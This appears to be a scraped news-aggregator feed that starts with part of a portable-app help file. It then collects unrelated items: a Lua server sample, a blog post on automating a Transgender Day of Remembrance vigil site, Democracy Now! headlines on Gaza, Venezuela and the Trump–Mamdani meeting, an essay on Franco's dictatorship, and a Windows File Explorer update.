These limitations mainly concern the use of UTF-8 and UTF-16 encoding of text, and more specifically filenames.  At this stage the app works with the legacy Windows-1252 character encoding for both text processing and filenames.  The app is therefore unable to handle foreign language text, or load and save files with special, foreign, or emoji characters in their filenames.  All text and filenames are restricted to english ASCII characters in the Windows-1252 encoding standard.

In addition, some options and minor operations may not work as expected, or at all on operating systems other than Microsoft Windows.  Though an enormous amount of time and effort has gone into harmonising the look and feel, behaviour and reliability of the app across multiple flavours of Microsoft Windows, Linux, and Mac operating systems, it is not always possible to catch every failure point, or in some rare cases make it work properly, though we always endeavor to do our best.

A side note, our codebase is still running well as 32 bit code in 2025.  Yes, 32 bit!  Some might see this as a limitation, but we see it as a flexible, inexpensive, and widely adopted execution pathway with support for many platforms and reuse / life extension of older equipment.

What makes a portable app special? A portable app is a big leap forward for apps in general.  A standard or traditionally engineered app requires a lot of support in the form of libraries, data files, images, scripts, etc and the list goes on.  You get the picture.  Some portable apps out there still include this bundle of bits, they merely offload it into a local folder.  A dump of goodies of sorts.

We tend to see a portable app in quite a different light.  Our vision of a portable app is designed tight, clean, free of bloat, and all data where possible is included directly within, structured right into the fabric of the app itself, and designed from the bare-metal up if required.

Though the most important difference between a traditional app and a portable app is that a portable app will not install on your computer.  This is extremely important as the installation process is often messy, and can clutter up your computer by dumping a lot of stuff all over the Windows file structure and registry, and over time may slow down and decrease the overall performance of your computer.

A portable app will not do this, which keeps your computer clean and running smooth and fast as it should.  Unfortunately most software is not designed with portable in mind.  They're more akin to a large leaky box of bits than tight engineering.  And because a portable app is not installed on your computer, it runs outside the normal scope of the operating system, and is not locked down or tied to it.  And thus can be moved about, from disk to disk, or computer to computer.

Typically a portable app will reside on a USB pen stick, removable media, or in a special folder on a portable hard disk.  This makes it easy to take from one computer to the next, and use over and over.  An immensely valuable freedom, and something an installed app can only dream of.

But a serious technical hurdle must be overcome for a truly portable app to be free.  And that is the humble setting.  Yes, a portable app must be able to handle it's settings on it's own.  It must be able to read them from disk, filter them, check and correct them where required, and write them back to disk.  All without the help of the Windows' registry or other operating system dependent structures.

An installed app typically can't or won't do this.  Instead, it relies on Windows and the registry to manage it's settings and other important data sets for it.  It therefore takes a higher degree of technical competence to escape this "tied to the operating system" situation.

Here is our current standard for a portable app:

  • Require no installation or setup
  • Require no additional DLL libraries to run and perform it's core function
  • Make no alteration to the host operating system, or its settings, files, libraries or core functions, or the Windows registry, unless it forms a part or a whole of the app's core function, and then, only when initiated by the user
  • Be able to run "out of the box"
  • Require no compiling, conversion, installation or setup of support structures in order to execute, except for when such an environment constitutes an execution enabling environment, such as a command translation service like Wine
  • Be free of zipped or otherwise externally bundled blob structures containing folders, files and bits
  • Operate on less powerful hardware to facilitate operation on a broad spectrum of computers
  • Less demanding API landscape to facilitate execution on a broad range of operating systems and software translation environments
  • Require no special software libraries be present in order to run, such as .NET or JAVA, unless typically pre-installed on the target operating system or execution environment
  • Not require an internet connection to run, unless the connection is required to fulfill the app's core function, such as a web server
  • Require no downloads, addons, or registration in order to run
  • Provide help and documentation offline via a built-in viewer, or by limited external means, such as Notepad
  • Be self-contained with all necessary files, data sets, and samples stored within it's internal structure, such that access be provided preferably through direct enabling mechanisms
  • Store, hold and manage external app settings and user data in a local sub-folder, and that sub-folder be easily identifiable as belonging to the app
  • Provide a mostly consistent appearance and experience to the user across the widest possible range of operating systems and execution environments
  • Value backwards compatibility, and be able to actively make use of that older hardware and software
  • Possess a compact, bloat-free footprint

How to remove the app and what you should do first Make sure any app related data that is precious to you is backed up before you delete.

As a portable app does not install itself on your computer there will be no automatic uninstall option listed in Windows.  The app must be removed manually.  But this is not difficult.

First, ensure the options below are unselected before proceeding.  Click "Options > Settings" and deselect:
1. Start button link
2. Desktop link
3. Automatic Startup link

If these links are not removed they may linger due to the oddities of some versions of Windows and it's often complex nature and protocols.

If this app is administered by a 3rd party system then that system should be used now to remove this app.  If not, then click the app menu button " " (top right) and select " Show App Folder".  An explorer window will display with the app's executable (*.exe) and storage folder listed.

Make sure any data precious to you has been backed up or moved out of the app's storage folder before proceeding.  When you're ready, close the app and right click on it's EXE "<app name>.exe" and select the Delete option.  If a prompt appears, confirm your intention to delete.  Repeat for the storage folder.

The app is now removed from your computer, USB pen stick, or hard disk.

Help my app doesn't look right what should I do? If for some reason your app doesn't appear right, or you think you've turned on or off some important system setting but you're not sure which one or where, not too worry, you can restore the app's default settings in two easy steps.

Step 1:
From anywhere in the app press the "F2" key to display the "Restore Defaults" confirmation window.

Step 2:
When you're sure you're ready to proceed, click the "Restore Defaults" button.  The app will reset, restoring all key system settings to their safe defaults, this includes color, font size, zoom level etc.

If you don't have a keyboard, or the "F2" key is not available / difficult to access, you can click the "Options" link from the top toolbar to display the options window, then click the "Restore Defaults..." button (bottom right of window), and lastly confirm by pressing the "Restore Defaults" button.  The app will reset / restore defaults.

MIT License Copyright 2025 Blaiz Enterprises ( www.blaizenterprises.com )

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Fast Lua runtime written in Rust

Hacker News
astra.arkforge.net
2025-11-24 13:57:53
Comments...
Original Article
-- Create a new server
local server = require("http").server.new()

-- Register a route
server:get("/", function()
    return "hello from default Astra instance!"
end)

-- You can also use the local variables within routes
local counter = 0
server:get("/count", function(request, response)
    -- consume the request body
    print(request:body():text())

    -- set header code (Optional)
    response:set_status_code(300)
    -- set headers (Optional)
    response:set_header("header-key", "header-value")

    counter = counter + 1
    -- and also can return JSON
    return { counter = counter }
end)

-- Configure the server
server.port = 3000

-- Run the server
server:run()

Climate Deal Excludes Fossil Fuel Phaseout as Wealthy Nations Place Burden "On the Backs of the Poor"

Democracy Now!
www.democracynow.org
2025-11-24 13:35:09
Global negotiations at the annual U.N. climate summit ended Saturday in Belém, Brazil, with a watered-down agreement that does not even mention fossil fuels, let alone offer a roadmap to phase out what are the primary contributors to the climate crisis. The COP30 agreement also makes no new commitme...
Original Article

Global negotiations at the annual U.N. climate summit ended Saturday in Belém, Brazil, with a watered-down agreement that does not even mention fossil fuels, let alone offer a roadmap to phase out what are the primary contributors to the climate crisis. The COP30 agreement also makes no new commitments to halt deforestation and does not address global meat consumption, another major driver of global warming.

“I’m angry at a really weak outcome. I’m angry at the fossil fuel lobbyists roaming the venue freely, while the Indigenous activists [were] met with militarized repression,” says Brandon Wu, director of policy and campaigns at ActionAid USA . “I have a special level of incandescent outrage at … the rich, developed countries of the Global North who come in to these conferences, and they act like they’re the heroes, when, in fact, what they’re doing is shifting the burden of a crisis that they caused onto the backs of the poor.”

“The absence of the United States is critical,” adds Jonathan Watts, global environment writer at The Guardian . “The United States under Donald Trump is trying to go backwards to the 20th century in a fossil fuel era, whereas a huge part of the rest of the world wants to move forward into something else.”



Guests
  • Brandon Wu

    director of policy and campaigns at ActionAid USA .

Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Automating updates to a digital vigil

Lobsters
ntietz.com
2025-11-24 13:20:39
Comments...
Original Article

November 20th each year is Transgender Day of Remembrance (TDoR) . It is a day when we memorialize those who've been lost to transphobia, through violence or suicide. And each year, I make the most difficult git commit of the year, updating the list of names in the digital vigil that I made a few years ago.

I was late doing it this year, and I did it on November 20th last year. Ideally, it would be done early. I keep procrastinating it, because it's tough emotional work. Next year, I want it to be early , so... how do I actually get myself to do that?

The solution is either more therapy or more automation. So naturally, I decided on the automation! (Don't worry, I have a therapist that I love.)

We'll need to solve two main problems: updating the lists of names, and deploying it on a schedule.

Updating the names

The digital vigil is a static site, and we need to know all the names when it's built. All the names are stored in a couple of arrays of strings in a Rust file [1] . We'll want to update that file, which means we get to do codegen, baby!

Let's tackle getting the names first.

An authoritative source of names for TDoR vigils is the website Trans Lives Matter . This is where I download the report from each year for manual updates. It's a great source of data, and I'm only using a fraction of what is there.

I decided to write a Python script to pull the data. I got partway through the script using the same endpoint the human-consumable webpage offers for a download, when I realized it gives me a zip file . After opening a few too many tabs, I remembered: there's an API for this! Of course there's an API, and like all principal engineers working on their hobby projects, I didn't remember to check the obvious things first [2] . After switching to the API, I got JSON directly, and the data was super easy to retrieve.

Here's what that looks like.

api_key = os.environ.get("TDOR_API_KEY")

def get_report(year, country="all"):
    """Retrieves the data for a given year's vigil.

    This will request the data from September 30 of the previous year through
    October 1 of the requested year.

    Params:
        - year:     (int) what year's vigil the data is for
        - country:  (str) scope of the data; default="all"

    """

    from_date = f"{year-1}-10-01"
    to_date = f"{year}-09-30"

    headers = { "User-Agent": "tdor-digital-vigil-bot" }
    path = f"/api/v1/reports/?key={api_key}&from={from_date}&to={to_date}&country={country}&category=&filter="

    conn = http.client.HTTPSConnection("tdor.translivesmatter.info")
    conn.request("GET", path, None, headers)

    resp = conn.getresponse()

    if resp.status != 200:
        print(f"Error: expected 200, got {resp.status} ({resp.reason})")
        exit(1)

    body = resp.read()
    data = json.loads(body)

    return data

The next portion is fun and straightforward: turning this into some Rust code! "Codegen" can make it sound fancy, but for a lot of problems like this, codegen can be really simple.

In this case, we just have a file that has two static arrays in it. The code generation is really easy: iterate through our list of names, but bracket them with lines that start and end our declarations.

It looks like this.

usa_data = get_report(2025, "usa")
all_data = get_report(2025, "all")

with open("src/names.rs", "w+") as f:
    all_names = [r["name"] for r in all_data["data"]["reports"]]
    usa_names = [r["name"] for r in usa_data["data"]["reports"]]

    f.write(f"pub const FULL_NAMES: [&'static str; {len(all_names)}] = [\n")
    for name in all_names:
        f.write(f"    \"{name.replace("\"", "\\\"")}\",\n")
    f.write("];\n");

    f.write("\n")

    f.write(f"pub const US_NAMES: [&'static str; {len(usa_names)}] = [\n")
    for name in usa_names:
        f.write(f"    \"{name.replace("\"", "\\\"")}\",\n")
    f.write("];\n");

And generates a file like this.

pub const FULL_NAMES: [&'static str; 367] = [
    "Name Withheld",
    ...
];


pub const US_NAMES: [&'static str; 69] = [
    ...
];

It worked the first time! Definitely did not take me a few rounds of fixing silly bugs, no, definitely not. Anyway!

We've got that settled for this year. Now we need to automate it.

Deploying on a schedule

The first thing I did here was turn to my favorite simple automation solutions: Jenkins and Kubernetes. Of course, where's the fun in thinking about it ourselves? Let's vibe code it. I'll fire up Cursor using the latest Claude models and we can roll.

...

Ahahahaha no.

I'm not going to vibe code a single thing, especially not on something so dear to me as this. And we're not going to use Jenkins or Kubernetes here. Not that I don't love them (I don't, but that's beside the point), there's just no reason to use them for this.

And here, we don't need much technology at all. This could definitely be automated, to have deploys happen on a schedule without my involvement. But... all those systems would be a little fragile, and if you run a deploy once a year, it's going to break. Then you also need notifications for failures, and notifications for notification failures [3] .

That's a lot of complexity for very little effort saved each year. The problem I have isn't that the build is complicated. I just run make build then make deploy . The problem is that I forget .

And how do we solve forgetting? Reminders.

I'll be reminded next year on October 15th to update the digital vigil.

* * *

Automation can be hard, but I think the hardest thing about it is knowing where to strike the balance. What should you put in the effort for, and what should you just keep doing by hand?

For this problem, part of it benefited from automation code, and the other half from just setting myself reminders. It is all about reducing friction.

Okay, now I've made the hardest commit of the year, and I've written about it. I'm steeped in some emotions right now, so I'm going to go hug my wife and have some chocolate. Take care of yourself, and remember that you are loved.


  1. I know I'm a walking stereotype ("oh look, the trans woman loves Rust"). It's not my fault, I'm just that cool.

  2. Look, it's not my fault my brain turns off after hours. I'm just adhering to the old woodworking maxim: measure once, cut twice.

  3. It's notifications for failures all the way down.

If you're looking to grow more effective as a software engineer, please consider my coaching services .

From Affordability to Genocide, Trump-Mamdani Meeting at White House Was Full of Surprises

Democracy Now!
www.democracynow.org
2025-11-24 13:15:32
After months of mutual animosity, President Donald Trump and New York City Mayor-elect Zohran Mamdani met for the first time in a widely anticipated meeting late last week. But after the two discussed Mamdani’s plans to lower the cost of living in New York City, where both men grew up, Trump s...
Original Article

After months of mutual animosity, President Donald Trump and New York City Mayor-elect Zohran Mamdani met for the first time in a widely anticipated meeting late last week. But after the two discussed Mamdani’s plans to lower the cost of living in New York City, where both men grew up, Trump said that he and Mamdani “agree on a lot more than I would have thought” and promised to work together once Mamdani takes office in January. The newly friendly relationship is likely temporary, but still “remarkable,” says Ross Barkan, who is writing a book about Mamdani’s rapid political rise. “If Trump is less antagonistic towards Mamdani, the idea is to have Trump do as little damage as possible to New York City,” Barkan says of Mamdani’s conciliatory approach to the meeting. “He’s not going to attack. He’s going to try to build coalitions.”

Barkan also comments on the brewing intra-party conflict between the Democratic establishment and the more left-wing Democratic Socialists of America — whose members, including Mamdani, typically run for elected office as Democrats — as well as what Trump’s lack of challenge to Mamdani’s assertion that Israel is committing a genocide in Gaza says about the shifting discourse on Israel-Palestine in the United States.


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

50 Years After Franco’s Death: Vindicating Democratic Memory

Portside
portside.org
2025-11-24 13:14:04
50 Years After Franco’s Death: Vindicating Democratic Memory Kurt Stand Mon, 11/24/2025 - 08:14 ...
Original Article

“Those who are condemned to repeat the past are not those who do not remember it, but those who do not understand it.”
Daniel Giglioli


This 20th of November marks 50 years since the death of dictator Francisco Franco in Spain. On that day, Franco died in a hospital bed as the head of state of a country he ruled with an iron fist, authoritarian and violent, for 40 years, after winning our Civil War with the help of Hitler and Mussolini. After the war, Franco imposed a fascist and criminal regime that plunged my country into one of the darkest and saddest periods in its history.

And yet, the rise of the far right today calls into question the harshness of the regime that ravaged Spain for four decades. Today we are beginning to hear that Francoism was not so bad, that it was not such a big deal, that it was a soft dictatorship… we are beginning to hear, ever louder, the narcotic whisper of the deniers. A discourse is beginning to take hold that does not exactly defend Francoism, but does present it as a “soft” regime and denies, minimises, or sugarcoats the criminal and systemic nature of Franco’s repression. It is no longer the ranting of “Viva Franco”, arms raised and blue shirts (the shirts of the Falange , the Spanish version of Mussolini’s Blackshirts). It is more subtle.

The far right is sowing doubts about the consensus that has been reached until the whisper becomes an ordinary part of the conversation. The dispute over memory is one of its battlegrounds (as it is in Italy, Argentina, Hungary, and Spain), and although until now I understood it as a denial of the criminal past of the fascisms of which they are the heirs, the step further that this reactionary whisper is taking seems to have another intention, which I would summarise as follows: if it is accepted that a dictatorship was not such a bad thing, the idea of an authoritarian government becomes more socially acceptable. It’s that simple.

The reactionary moment in the West

One of the founding pillars of fascism in the past, and of the far right today, is the one that links democracy with misgovernment or corruption. Its model is what Viktor Orbán christened (and established) in Hungary, “illiberal democracy”, a euphemism behind which to hide an electoral autocracy. This is where the attack on democratic memory comes in, lest younger generations really know what fascism was, what Francoism was: blurring the memory of what an authoritarian far-right government really means in order to make it more acceptable.

At an event in Athens commemorating the 50th anniversary of the end of dictatorships in Spain, Greece, and Portugal, after hearing about the epic Carnation Revolution that overthrew the Portuguese dictatorship and the turmoil that brought down the Junta of the Colonels in Greece, I was left thinking, and when it was my turn to talk about the Spanish case, I could only begin with: “Well, in Spain, Franco died in his bed,” which made the audience smile. They immediately understood that in Spain there was no revolution, no crisis of the regime. In Spain, the dictator died shrouded in a cloak of silence and fear so thick that it covered up his crimes.

The facts are well known, but for those who minimise the criminal nature of the Franco regime, it is good to remember them, vindicate them, and continue to think about how it was possible:

between 115,000 and 130,000 disappeared; 150,000 murdered; 30,000 stolen children; 2,800 mass graves (the largest, the Valley of the Fallen, holds the remains of more than 30,000 people); 500,000 exiles; up to 300,000 political prisoners at the beginning of the military regime alone. Spain is the second country in the world with the most disappeared people in ditches. All these figures come from Judge Garzón’s investigation, to which we can add those of Javier Rodrigo: 188 concentration camps operated in Spain after the Civil War; and those of Julián Casanova, who estimated that 50,000 Reds were murdered between 1939 and 1946.

Read that last figure again. In her beautiful and essential essay El arte de invocar la memoria ( The Art of Invoking Memory , 2024), historian Esther López Barceló defines the Franco regime on the basis of that number: “The mass executions of the early years of the dictatorship laid the foundations for the new state.” The numbers of Franco’s repression are only the bloody tip of the iceberg of fear on which the dictatorship was built. It is good to remember this in the country that never judged it.

One country that did was Argentina. Every 24 March, mass marches take place in its cities in memory of the 30,000 people who disappeared during the military dictatorship. Today, Milei, very much in line with the above, reduces the number to 8,000 and downplays one of the bloodiest repressions of the 20th century. “There are 30,000,” shouts the crowd, in a dispute that is not about numbers, but about futures.

In the aforementioned essay by Esther López Barceló, I find a powerful idea that connects different ways of understanding memory. She tells us that while in Buenos Aires, she visited ESMA, one of the worst torture centres in the country of the disappeared: “I knew I was in a sanctuary, in a space still heavy with the air of violence, but I was not fully aware that I was in an area cordoned off by forensic scientists: the scene of a crime that was and continues to be under judicial investigation. Don’t blame me. ‘I come from the anomaly,’ I should have told them. Spain, the scene of the perfect crime. The one that has been hidden from us until we ignored it. Until we believed that it didn’t happen. That it never happened. I come from the country of the crime that didn’t happen.”

Because we know that it did, we know what happened, and we even have a Memory Law, and yet… in the Puerta del Sol (our ESMA), there is not a single sign of the torture, not even a plaque under the window where we all know that Julián Grimau, the communist leader murdered by the regime,  was thrown.

Invoking the memory that breaks them

To break the narrative that links Franco’s regime to a soft dictatorship , it is essential to talk about democratic memory, to recognise the fear imposed by mass graves. And the truth is that what really breaks them, what dismantles the reactionary whisper of “it wasn’t such a bad dictatorship”, is to do so from a place that questions them, that points them out, that tells them from the present that this wound still hurts us and that it is on this wound that we want to build a future where this will never happen again.

Years ago, David Becerra dazzled me in his study The Civil War as Literary Fashion (2015) with one of his discoveries: he denounces that for years the Civil War and Francoism have been recounted or novelised in an ahistorical way, that is, narrated from a present where the conflict is happily resolved, without a common thread, as if it had nothing to do with the conflicts of the present. As if the past and memory had no direct relationship with today and, more importantly, with our ability to project futures.

A memory for the future

“We have to learn to build a memory of resistance,” says Enzo Traverso, always lucid, and to do so, I think, we must bring the defeated out of “that perfect crime that was the repression of Francoism”, to use López Barceló’s apt words.

Using education as a tool for the future, because, as the phrase with which I begin this article strikes home, a generation that does not know, that is unaware, is doomed to repeat history. The far right disputes memory in order to open up the possibility of authoritarian government on the horizon of expectations. So let us continue to dispute the memory of resistance from the present so that our horizon is built from a different place: the idea that fascism will never return, ever again.

Marga Ferré is President of transform! europe and Co-President of The Foundation for Critical Studies / Fundación de Estudios Críticos FEC (Formerly Foundation for a Citizens’ Europe / Fundación por la Europa de los Ciudadanos), Spain.

transform! europe is a network of 38 European organisations from 22 countries, active in the field of political education and critical scientific analysis, and is the recognised political foundation corresponding to the Party of the European Left (EL). This cooperative project of independent non-profit organisations, institutes, foundations, and individuals intends to use its work in contributing to peaceful relations among peoples and a transformation of the present world.

Microsoft tests File Explorer preloading for faster performance

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 13:08:08
Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times on Windows 11 systems. [...]...
Original Article

Windows 11

Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times and performance on Windows 11 systems.

According to Microsoft, the app will load automatically once the feature is toggled on without visible changes to users, who should only notice faster File Explorer launches when accessing files and folders.

However, this is an optional feature, and those who prefer to disable preloading can uncheck "Enable window preloading for faster launch times" in File Explorer's Folder Options under the View tab.

Wiz

"We're exploring preloading File Explorer in the background to help improve File Explorer launch performance," the Windows Insider Program Team said .

"Looking forward to your feedback! If you do encounter any issues, please file them in the Feedback Hub under Files Folders and Online Storage > File Explorer Performance, or Files Folders and Online Storage > File Explorer."

These File Explorer speed and performance improvements follow the May 2025 rollout of Startup Boost , a similar optional feature for Office applications that launches a Windows scheduled task automatically in the background during system logon to help Office apps load faster.

The feature preloads apps in a paused state until the app enhancements, keeping them paused until launched or removed from memory to reclaim resources.

Context menu updates

Microsoft is also updating the File Explorer context menu to reduce clutter while maintaining easy access to less frequently used actions by reorganizing menu items into groups of similar tasks.

File Explorer context menu
File Explorer context menu (Microsoft)

For instance, actions such as 'Compress to ZIP file,' 'Copy as Path,' 'Set as Desktop Background,' and image rotation options have been moved to a new "Manage file" flyout menu.

Additionally, cloud provider options such as 'Always Keep on this Device' and 'Free Up Space' now appear within their respective cloud provider flyouts, alongside the Send to My Phone option. The Open Folder Location command has also been repositioned next to 'Open' and 'Open with' for better grouping.

Microsoft also noted that the 'Manage file' label may change in future updates based on user feedback submitted through the Feedback Hub under Desktop Environment > Right-Click Context Menu.

These features are now rolling out to Windows Insiders in the Dev and Beta channels running Windows 11 25H2 who have installed the 26220.7271 (KB5070307) preview build.

Wiz

7 Security Best Practices for MCP

As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.

This free cheat sheet outlines 7 best practices you can start using today.

Headlines for November 24, 2025

Democracy Now!
www.democracynow.org
2025-11-24 13:00:00
Israeli Airstrikes Kill at Least 24 Palestinians Despite U.S.-Brokered Ceasefire, Israeli Airstrike on a Beirut Suburb Kills 5 People, Including Hezbollah’s Acting Chief of Staff, Trump Admin Set to Designate Maduro and His Gov’t Allies as Members of a Foreign Terrorist Organization, U.S...
Original Article

You turn to us for voices you won't hear anywhere else.

Sign up for Democracy Now!'s Daily Digest to get our latest headlines and stories delivered to your inbox every day.

Independent Global News

Donate

Headlines November 24, 2025

Watch Headlines

Israeli Airstrikes Kill at Least 24 Palestinians Despite U.S.-Brokered Ceasefire

Nov 24, 2025

Funerals are being held in Gaza today after Israeli airstrikes killed at least 24 people on Saturday, despite the U.S.-brokered ceasefire that began on October 10. Gaza’s Government Media Office says Israel has violated the truce nearly 500 times in 44 days. Meanwhile, UNICEF reports that Israel has killed two children every day during the ceasefire. At least 67 children have been killed in Gaza in recent weeks. This is Ahmed Abu Shaweesh, whose relatives were killed in Israeli airstrikes over the weekend.

Ahmed Abu Shaweesh : “What’s the reason? Nobody knows. Aren’t we supposed to be in a truce? We’re looking at the house. We’ve been trying to forget this scene for a month. We’re starting to go back to our normal life. How are we supposed to go back to normal life? We are back to martyrs, back to destruction, back to injuries. What’s the reason? We’re confused. No one knows.”

Israeli Airstrike on a Beirut Suburb Kills 5 People, Including Hezbollah’s Acting Chief of Staff

Nov 24, 2025

In Lebanon, an Israeli airstrike on a Beirut suburb on Sunday killed five people and wounded 28, according to the Lebanese Health Ministry. Israel claims that it assassinated Hezbollah’s acting chief of staff. The attack comes despite a U.S.-brokered ceasefire between Hezbollah and Israel went into effect last year.

Ali Ammar : “There was a ceasefire under international auspices, led primarily by the United States of America. Since then, and since the announcement of the agreement and the halt of military operations, the Israeli enemy has remained persistent and addicted to continuing its aggression, targeting buildings, people and civilians. And you know that this area is a civilian area.”

Trump Admin Set to Designate Maduro and His Gov’t Allies as Members of a Foreign Terrorist Organization

Nov 24, 2025

The U.S.’s top military officer will visit Puerto Rico today as a U.S. Navy warship dispatches to the Caribbean. The visit by General Dan Caine, the chair of the Joint Chiefs of Staff, comes as the Trump administration is set to formally designate Venezuelan President Nicolás Maduro and his government allies as members of a foreign terrorist organization, “Cártel de los Soles.” The entity is not actually a cartel and is instead a reference to military officers and officials allegedly involved in corruption and other illegal activities in Venezuela. Reuters is reporting that the U.S. is also considering a new phase of covert operations in Venezuela. It would be a major escalation after U.S. airstrikes on alleged drug boats in recent weeks have killed more than 80 people. Meanwhile, six airlines have canceled their flights to Venezuela, after the Federal Aviation Administration warned of a “worsening security situation” and “heightened military activity” in the region.

U.S., Ukrainian and European Officials in Geneva to Discuss U.S. Proposal to End Russia’s War on Ukraine

Nov 24, 2025

U.S., Ukrainian and European officials are meeting in Geneva to discuss the U.S. proposal to end Russia’s war on Ukraine. The 28-point plan was negotiated by U.S. and Russian officials without the involvement of Ukraine. Reuters reports European negotiators submitted a modified version of the plan that reverses some of the proposed limits to the size of Ukraine’s military, as well as some territorial concessions. On Sunday Ukrainian President Volodymyr Zelensky once again praised the United States and President Trump, after Trump wrote on social media, ” UKRAINE ' LEADERSHIP ' HAS EXPRESSED ZERO GRATITUDE FOR OUR EFFORTS .” Meanwhile, Russia has continued deadly attacks on Ukrainian civilians, including a drone strike on Kharkiv on Sunday that killed four people and wounded 17 others.

Trump Repeatedly Praises Mamdani During Oval Office Meeting

Nov 24, 2025

Image Credit: White House photo

New York City Mayor-elect Zohran Mamdani met with President Trump at the White House Oval Office Friday. During the meeting, President Trump repeatedly praised Mamdani and said he would feel “very confident that he can do a very good job.” President Trump also said he would feel “comfortable” living in New York under Mamdani’s leadership. Speaking to reporters, Mamdani maintained his past criticisms of President Trump.

Jacqui Heinrich : “Are you affirming that you think President Trump is a fascist?”

Mayor-elect Zohran Mamdani : “I’ve spoken about the” —

President Donald Trump : “That’s OK. You can just say yes. So” —

Mayor-elect Zohran Mamdani : “OK. All right.”

President Donald Trump : “OK?”

Mayor-elect Zohran Mamdani : “Yeah.”

President Donald Trump : “It’s easier.”

Mayor-elect Zohran Mamdani : “Yeah.”

President Donald Trump : “It’s easier than explaining it. I don’t mind.”

On Sunday, Mamdani doubled down on his views that President Trump is a fascist and a despot in an interview with NBC’s “Meet the Press.”

Kristen Welker : “Do you think that President Trump is a fascist?”

Mayor-elect Zohran Mamdani : “And after President Trump said that, I said, 'Yes.' And” —

Kristen Welker : “So you do?”

Mayor-elect Zohran Mamdani : “And that’s something that I’ve said in the past. I say it today. And I think what I appreciated about the conversation that I had with the president was that we were not shy about the places of disagreement, about the politics that has brought us to this moment.”

We’ll have more on Mamdani’s meeting with President Trump later in the broadcast.

Democratic Lawmakers File Police Complaints After Trump’s Posts Accuse Them of “Seditious Behavior”

Nov 24, 2025

Several Democratic lawmakers have filed police complaints after President Trump called for them to be put to death for what he called “seditious behavior.” Trump’s threat came after six lawmakers — who are veterans of the military or CIA — called on active-duty service members to refuse illegal orders. Congressmembers Jason Crow, Chris Deluzio and Chrissy Houlahan told the U.S. Capitol Police that Trump’s call for their execution has undermined their personal safety while putting the lives of congressional staffers at risk. Crow released audio of death threats phoned into his offices, while Deluzio reported his congressional offices in western Pennsylvania received bomb threats. On Friday, Trump doubled down on his threats, accusing the Democrats of ” SEDITION AT THE HIGHEST LEVEL .”

Trump Denied Federal Disaster Aid to Chicago Residents After Two Major Storms

Nov 24, 2025

President Trump denied federal disaster aid to thousands of Chicago residents, even though his administration documented extraordinary damage from two major storms this summer. That’s according to Politico, which reports it’s the first time since at least 2007 that any president has refused to help residents recover from such extensive damage to their homes. Trump’s denial stunned former FEMA officials. It comes after Trump said Illinois Governor JB Pritzker and Chicago Mayor Brandon Johnson should be jailed over their resistance to Trump’s surge of federal immigration agents and National Guard forces into the Chicago region.

ICE Agents in Oregon Violently Abduct 17-Year-Old High School Student on Lunch Break

Nov 24, 2025

In Oregon, federal immigration agents forced a 17-year-old high school student from his vehicle and abducted him as the teen took a lunch break on Friday. Video shows masked ICE agents smashed the driver’s side window of a car being driven by Christian Jimenez, a senior at McMinnville High School, who told them he was a U.S. citizen, to which an agent replied “get out of the car” and “I don’t care.” Jimenez’s brother says the teen was racially profiled and injured by shattered glass. He was taken to an ICE facility in Portland and released later that day. He’s been charged with “interference or obstruction of an investigation.”

SCOTUS Temporarily Restores Texas Congressional Map Declared an Illegal Gerrymander by Lower Court

Nov 24, 2025

The U.S. Supreme Court has temporarily restored Texas’s new congressional map that’s designed to allow Republicans to win up to five additional House seats in next year’s midterm elections. On Friday, Supreme Court Justice Samuel Alito paused a lower court ruling which stated that the new map was an illegal racial gerrymander. The high court has asked plaintiffs to respond by today before a final ruling on the congressional map.

50 Students Escape After Gunmen Abduct Hundreds from Catholic School in Nigeria

Nov 24, 2025

In Nigeria, 50 kidnapped students escaped their captors on Friday after gunmen stormed a Catholic boarding school and abducted over 300 children and 12 teachers last week. The Christian Association of Nigeria says the children who managed to escape have been reunited with their families. Now a major military-led search and rescue mission is underway to find the remaining children and teachers. Last week, gunmen stormed another boarding school and abducted 25 schoolgirls and killed the vice principal. The recent kidnappings have prompted officials to close 47 schools in northern Nigeria. President Bola Tinubu has also ordered the hiring of 30,000 more police officers, but Nigerians are calling for officials to take more action.

Elizabeth Awodeji : “We have seen our old women being kidnapped, being robbed in this country that we call giant of Africa. It is so bad. And the current government, they are not doing anything to what is happening.”

G20 Concludes Summit in South Africa Boycotted by U.S.

Nov 24, 2025

The G20 summit in South Africa concluded yesterday. It was the first time the event was held in the African continent. The United States boycotted the meeting, citing false allegations that South Africa was mistreating its white-minority Afrikaners. Leaders gathered at the summit adopted a joint declaration to address the climate crisis and other global challenges without input from the United States. The White House claimed that South Africa had “weaponized their G20 presidency to undermine the G20’s founding principles.” Meanwhile, Brazil’s President Luiz Inácio Lula da Silva declared the G20 summit in South Africa a success.

President Luiz Inácio Lula da Silva : “President Trump has been demonstrating this for several months now. He has already withdrawn from UNESCO and the World Trade Organization. He is attempting to preach the end of multilateralism in practice, trying to strengthen unilateralism. I believe multilateralism will prevail.”
Next year’s G20 summit will be held in the United States.

COP30 Climate Summit Concludes Without Agreement to Phase Out Fossil Fuels

Nov 24, 2025

